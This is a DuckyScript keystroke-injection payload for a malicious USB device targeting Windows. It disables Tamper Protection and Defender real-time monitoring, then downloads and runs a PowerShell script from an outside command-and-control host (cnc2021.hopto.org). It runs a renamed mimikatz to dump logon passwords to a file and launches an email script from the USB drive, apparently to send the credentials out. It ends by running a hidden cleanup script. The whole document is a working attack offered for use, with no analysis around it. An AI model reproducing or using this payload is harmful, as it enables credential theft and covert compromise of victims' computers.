DELAY 3000
DELAY 3000
DELAY 3000
DELAY 1000
GUI
DELAY 250
STRING Tamper Protection
DELAY 250
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB	
DELAY 1000
TAB
DELAY 1000
SPACE
DELAY 1000
ALT y
DELAY 1000
ALT f4
DELAY 1000
GUI r
DELAY 3000
STRING powershell Start-Process powershell -Verb runAs
DELAY 250
ENTER
DELAY 3000
ALT y
DELAY 5000
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 250
ENTER
DELAY 1000
STRING Set-ExecutionPolicy RemoteSigned -Force
DELAY 250
ENTER
DELAY 1000
STRING IEX ((New-Object System.Net.WebClient).DownloadString('http://cnc2021.hopto.org/GetFiles.ps1'))
DELAY 250
ENTER
DELAY 10000
STRING Start-Process Powershell -window hidden $env:USERPROFILE\AppData\Local\Temp\Winupdate.ps1
DELAY 250
ENTER
DELAY 10000
STRING Start-Process $env:USERPROFILE\AppData\Local\Temp\katzlol.exe
DELAY 250
ENTER
DELAY 5000
STRING log c:\pwlog.txt
DELAY 250
ENTER
DELAY 1000
STRING privilege::debug
DELAY 250
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 250
ENTER
DELAY 3000
STRING exit
DELAY 250
ENTER
DELAY 3000
STRING $USB = (Get-WmiObject Win32_Volume -Filter "DriveType='2'" | ?{$_.Label -eq 'CIRCUITPY'}).DriveLetter; Set-Location $USB; ./Email.ps1
DELAY 250
ENTER
DELAY 8000
STRING Start-Process Powershell -window hidden $env:USERPROFILE\AppData\Local\Temp\Cleanup.ps1
DELAY 250
ENTER
DELAY 1000
STRING exit
REM DELAY 250
REM ENTER
REM DEALY 1000
REM GUI a
REM DELAY 1000
REM TAB
REM DELAY 1000
REM TAB
REM DELAY 1000
REM TAB
REM DELAY 1000
REM SPACE
REM DELAY 1000
REM GUI a